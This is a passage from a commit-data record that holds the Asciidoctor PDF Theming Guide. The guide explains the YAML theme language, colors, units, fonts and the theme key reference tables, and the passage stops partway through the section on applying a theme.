attributes\n","repos":"mojavelinux\/asciidoctor-pdf,theimdal\/asciidoctor-pdf,theimdal\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* transparent color\n* additional fonts provided by Asciidoctor PDF\n* images\n* title page layout\n* title image\n* title page background image\n* keys\n* how to apply the theme\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties, but only a fraction of what CSS supports.\nUnlike CSS, all selectors are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_color`).\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme.\nThe converter uses the information from this map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined 
with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very 
\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions in the next section.\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations for calculating values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: As in programming languages, multiply and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number down to the previous integer.\nceil(...):: Rounds the number up to the next integer.\n\nYou might use these functions in font size calculations so that you get whole values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, we humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n
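\nFor instance, since a point is 1\/72 of an inch, a value of 0.75in works out to 54pt (0.75 * 72 = 54).\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].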
\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how an RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nPENDING\n\n== Fonts\n\nYou can select from built-in PDF fonts or custom fonts loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF files for the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: 
roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [2]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: 
NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_h<n>_font_color\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_h<n>_font_family\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_h<n>_font_size\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_style\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n=== Title page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: 
$base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n\/\/ Blocks include admonition, example, quote, verse, sidebar, image, listing, literal, and table.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\n=== Caption\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: Notoserif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: Notoserif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n\n|===\n\n=== Sidebar\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: 
bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n\n=== Outline list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"
\"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,5,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n right: '\\{page-number}'`\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n center: '\\{page-number}'`\n|===\n\n{asterisk} `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nFor example:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis 
\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n
